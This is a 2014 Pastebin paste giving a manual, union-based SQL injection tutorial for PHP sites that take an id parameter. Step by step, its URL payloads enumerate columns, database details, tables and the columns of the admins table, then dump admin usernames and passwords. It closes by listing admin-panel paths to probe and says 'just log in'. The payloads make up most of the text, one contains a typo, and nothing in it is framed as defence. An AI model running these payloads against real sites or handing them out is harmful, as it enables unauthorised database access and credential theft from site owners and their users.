API tools faq
paste
Advertisement
acerz

Basic SQL Injection (Manual)

acerz
Jul 9th, 2014
4,102
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.29 KB | None | 0 0
raw download clone embed print report
  1. Basic SQL Injection Tutorial by "Linux & Hacking Tutorials"
  2.  
  3. 1) Counting columns: Increase the number untill you get an ERROR
  4. .php?id=1 order by 1-- ->no error
  5. .php?id=1 order by 2-- ->no error
  6. .php?id=1 order by 3-- ->no error
  7. .php?id=1 order by 4-- ->no error
  8. .php?id=1 order by 5-- ->ERROR!
  9. We got an error on 5, so the column count is 4!
  10.  
  11. 2)Finding vulnerable column: add - before ID number, replace order by with union all select and start counting 4 columns: 1,2,3,4
  12. .php?id=-1 union all select 1,2,3,4--
  13. Page sends vulnerable column: 2
  14.  
  15. 3)Gathering info about database: replace 2 in the syntax with group_concat() and add custom text inside the brackets
  16. .php?id=-1 union all select 1,group_concat(database(),0x3a,user(),0x3a,version()),3,4--
  17. Then we got database name, user and version.
  18.  
  19. 4)Gathering tables from database: put table_name inside the brackets and add "from information_schema.tables where table_schema=database()--" to the rest of the URL before --
  20. .php?id=-1 union all select 1,group_concat(talbe_name),3,4 from information_schema.tables where table_schema=database()--
  21. Page sends tables: news,articles,photos,admins
  22.  
  23. 5)Gathering columns from admin's table: In this case the admin login should be in admins table
  24. replace every "table" with "column" and add "from information_schema.columns where table_name=0xHEX--" to the rest of the URL
  25. The HEX represents HEX value of admins table which is 61646d696e73
  26. HEX converter: http://www.swingnote.com/tools/texttohex.php
  27. .php?id=-1 union all select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=0x61646d696e73--
  28. Page sends: id,user,password
  29.  
  30. 6)Gathering admins' logins: put user,password in the brackets and add "from (table name here)--" to the rest of the URL
  31. .php?id=-1 union all select 1,group_concat(user,0x3a,password),3,4 from admins--
  32. Page sends: admin1:123456
  33. So, that means the user is admin1 and the password is 123456
  34.  
  35. 7)Finding admin panel: You can use tools like this: http://www.scan.subhashdasyam.com/admin-panel-finder.php or do it manualy with
  36. /admin
  37. /admin.php
  38. /login
  39. /login.php
  40. /cms
  41. /adm
  42. ...
  43. When you find the panel, just log in :)
  44. That's all
  45. Video Tutorial: http://youtu.be/YMoJrJE0qfA
  46. Facebook group on hacking tutorials: https://www.facebook.com/groups/706155462750576/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!